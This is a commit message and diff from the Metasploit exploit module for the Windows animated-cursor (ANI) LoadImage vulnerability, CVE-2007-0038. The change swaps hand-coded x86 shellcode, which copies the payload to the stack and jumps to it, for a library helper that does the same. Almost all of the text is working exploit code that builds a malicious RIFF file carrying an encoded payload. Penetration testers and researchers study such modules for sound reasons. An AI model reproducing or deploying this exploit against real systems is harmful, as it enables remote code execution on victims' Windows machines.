Merged in copy_to_stack feature from HTTP exploit

git-svn-id: file:///home/svn/framework3/trunk@4614 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/email/ani_loadimage_chunksize.rb

@@ -280,22 +280,19 @@ class Exploits::Windows::Email::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
 			riff[trampoline_doffset + 1, 4] = [riff.length - trampoline_doffset - 4].pack('V')
 		end
 
-		# Our ANI file is randomly placed into a read-only segment, the only reliable
-		# solution is to copy our payload back to the stack and execute it there. This
-		# is non-optimal and should be replaced soon.
-		copier =
-			"\xeb\x0f"+              # jmp _end
-			"\x68\x00\x04\x00\x00"+  # push 1024
-			"\x59"+                  # pop ecx
-			"\x5e"+                  # pop esi
-			"\x29\xcc"+              # sub esp, ecx
-			"\x89\xe7"+              # mov edi, esp
-			"\xf3\xa4"+              # rep movsb
-			"\xff\xe4"+              # jmp esp
-			"\xe8\xec\xff\xff\xff"   # call _start
-									
 		# Place the RIFF chunk in front and off we go
-		ret = "RIFF" + [riff.length].pack('V') + riff + copier + payload.encoded
+		ret = "RIFF" + [riff.length].pack('V') + riff
+
+		# We copy the encoded payload to the stack because sometimes the RIFF
+		# image is mapped in read-only pages.  This would prevent in-place
+		# decoders from working, and we can't have that.
+		ret << Rex::Arch::X86.copy_to_stack(payload.encoded.length) 
+
+		# Place the real payload right after it.
+		ret << payload.encoded
+
+		ret
+		
 	end
 
 	# Generates a riff chunk with the first bytes of the data being a relative